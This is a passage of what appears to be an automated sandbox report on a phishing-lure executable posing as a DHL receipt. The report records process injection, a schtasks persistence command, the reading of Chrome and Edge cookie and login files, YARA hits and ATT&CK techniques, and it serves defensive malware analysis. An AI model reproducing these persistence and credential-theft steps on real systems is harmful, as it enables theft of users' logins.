                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe    Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe    Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Section loaded: NULL target: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe    Section loaded: NULL target: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe    Section loaded: NULL target: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe    Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe    Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe    Thread register set: target process: 7620
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe    Thread APC queued: target process: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe    Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe    Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe    Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6FD008
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe    Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe    Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe    Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AD1008
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe    Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe    Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp"
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe    Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687461556.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000000.2400830514.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000000.2559733028.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp    Binary or memory string: Program Manager
                Source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687461556.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000000.2400830514.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000000.2559733028.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp    Binary or memory string: Shell_TrayWnd
                Source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687461556.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000000.2400830514.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000000.2559733028.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp    Binary or memory string: Progman
                Source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687461556.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000000.2400830514.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000000.2559733028.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp    Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Queries volume information: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | VolumeInformation
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll | VolumeInformation
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll | VolumeInformation
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.4688006537.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2481904165.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.4688006537.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2481904165.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                MITRE ATT&CK Matrix

                The matrix is listed below by tactic column; the number in parentheses after a technique is the count shown next to it in the original matrix.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: Process Injection (512); Scheduled Task/Job (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
